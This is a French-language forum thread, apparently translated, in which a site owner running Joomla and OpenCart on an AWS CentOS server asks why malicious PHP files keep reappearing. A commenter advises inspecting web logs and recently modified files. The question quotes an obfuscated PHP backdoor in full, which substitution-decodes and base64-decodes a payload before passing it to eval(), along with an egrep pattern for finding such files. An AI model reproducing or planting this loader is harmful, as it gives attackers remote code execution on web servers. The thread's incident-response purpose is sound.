Nous avons l'instance AWS ec2 avec CentOs. Il y a 4 sites hébergés sur cette instance, un site HTML et PHP statique, deux Joomla (v3.4.5), un Opencart (v2.0.1.1).Les fichiers malveillants PHP sont créés automatiquement
Hier, nous avons trouvé quelques fichiers qui ne sont pas liés à notre code, semble malware. Nous avons exécuté egrep -Rl 'function.*for.*strlen.*isset' /home/
et constaté qu'il y a quelques fichiers avec l'exemple de code suivant.
<?php
function rjlynu($vkofjapoz, $avsepejks){$gjcdh = ''; for($i=0; $i < strlen($vkofjapoz); $i++){$gjcdh .= isset($avsepejks[$vkofjapoz[$i]]) ? $avsepejks[$vkofjapoz[$i]] : $vkofjapoz[$i];}
$jcmkpl="base64_decode";return $jcmkpl($gjcdh);}
$fkcrhcwlxx = 'KAYS3ymsuxKqMLBk10JIDxYauxMVX0MsMVddThITKAYS3ymsuxKqML5HupmY18MH18F8EcNkldkNuxMV'.
'X0Ma1fydX0MQ3Z98TcNkldkN1LyQx0BkXZyaXAYC3xKqF4bn4bJkuL9H1fyatxG'.
'Y1YmPDfmVt4w5ThITKAYS3ymsuxKqMLpP26mY2Ay7txBkXL9atAYCuz1IF4bn4wkkueNqtfyV1'.
'LYHXYm7XLpdDxMYT6JOR6mZByMhzRmlE4N8GzrdE7N8E4N8v41kO4bw2dqw'.
'O4BVuxFwvzJJ18MP2zwkldqwO4BVuxGXO8MY10yIt4MtZVM73Ay73VMtOcQwFcITO4JYDLPHOAMP1LRLG6mYXf'.
'GHuARq1LyV3Z6I3xkYT4BVuxFkThITaKqTu8ySD0BkXLrwD0ystAmCx0GQ1fYdx0BPu0FqMiBY2'.
'iKk48ITO4NwO4BQuxPQOcQw10BV3xJatA681VwbtAyrt4dwMs5Pve'.
'1kldqTO4NwO4BQuxPQOcQw10BVx0MY1A5PDLRqO75POAPVuZDmx4OeE4NeZVNeE4NbtAyrt4'.
'bn4eNwO4NbtAyrt4NmOiGQ1YmVuxJIDZGYT4OWELU+OedwOeOIO4BQuxPQThITO4NwO4BQ'.
'uxPQOcQw10BVx0MY1A5PDLRqOYdeveOIO4OwxzNeE4NbtAyrt4bn4wqwO4Nw1fyQtxMSO4BQux'.
'PQldkm4wk7XA6s1VJhhyBKOiITO4JdtZMI3ZFwM6GGy6JaRUmzy4NmOcOpldqwOiJpDf5kDVNbKpMFBe'.
'NmO4M11Y5SO7ITO4JdtZMI3ZFwMABHxLBYD8y8OcQwFcITO4JdtZMI'.
'3ZFwMUBYD8y8X0yQ1iyQO4NwO4NmO4tYDLPHMsITO4JdtZMI3ZFwMABHx0uY18NwvzJfDZ5suhITO4JdtZMI3ZFwM6BkXZyHtxK'.
'wO4NwO4NwO4NmOcUpldqwOiJpDf5kDVNbyAYCuZ5kXZYQO4NwO'.
'MY10yIt4MtZVM73Ay73VMtOcQwFhIT4fy73AWwDf6suhDQxLySDLmbuzPsuxMkDZ5k2fRqMiMY1VbkldqTu'.
'xPkt4wkld==';
$ghjnzmrjlg = Array('1'=>'c', '0'=>'3', '3'=>'a', '2'=>'e', '5'=>'x', '4'=>'C', '7'=>'j', '6'=>'F', '9'=>'5', '8'=>'n', 'A'=>'G', 'C'=>'t', 'B'=>'R', 'E'=>'L', 'D'=>'Y', 'G'=>'N', 'F'=>'M', 'I'=>'s', 'H'=>'v', 'K'=>'Q', 'J'=>'B', 'M'=>'J', 'L'=>'2', 'O'=>'I', 'N'=>'A', 'Q'=>'0', 'P'=>'h', 'S'=>'u', 'R'=>'U', 'U'=>'E', 'T'=>'K', 'W'=>'8', 'V'=>'y', 'Y'=>'l', 'X'=>'b', 'Z'=>'W', 'a'=>'f', 'c'=>'D', 'b'=>'k', 'e'=>'i', 'd'=>'w', 'g'=>'6', 'f'=>'m', 'i'=>'H', 'h'=>'T', 'k'=>'p', 'j'=>'r', 'm'=>'9', 'l'=>'O', 'o'=>'q', 'n'=>'7', 'q'=>'o', 'p'=>'1', 's'=>'z', 'r'=>'4', 'u'=>'Z', 't'=>'d', 'w'=>'g', 'v'=>'P', 'y'=>'V', 'x'=>'X', 'z'=>'S');
eval(rjlynu($fkcrhcwlxx, $ghjnzmrjlg));?>
Même si nous supprimons ces fichiers, ils sont créés encore et encore.
Quel pourrait être le problème? Comment pouvons-nous trouver la cause profonde derrière cela et quelle est la solution permanente?
Merci
Votre site a été piraté. Vérifiez vos journaux Web pour localiser la "fuite" ou la vulnérabilité dans vos CMS et corrigez-les dès que possible. – macl
@macl: C'est le problème, je ne comprends pas exactement ce que je devrais rechercher dans les journaux? Toute suggestion spécifique? –
Votre Joomla semble mis à jour, mais la version Opencart a presque 1 an. Quoi qu'il en soit, cela pourrait être n'importe quelle extension de votre CMS. Je regarderais dans les journaux pour répéter les URL de la même adresse IP (ou des blocs IP, les script kiddies utilisent normalement des proxies pour masquer leurs attaques), des demandes faites à des moments impairs de la journée, et d'autres fichiers cachés dans votre structure de répertoire. ne devrait pas être là, ou modifié dans les dates récentes (trouver .mmt +7, par exemple). Il n'y a pas de recette exacte. – macl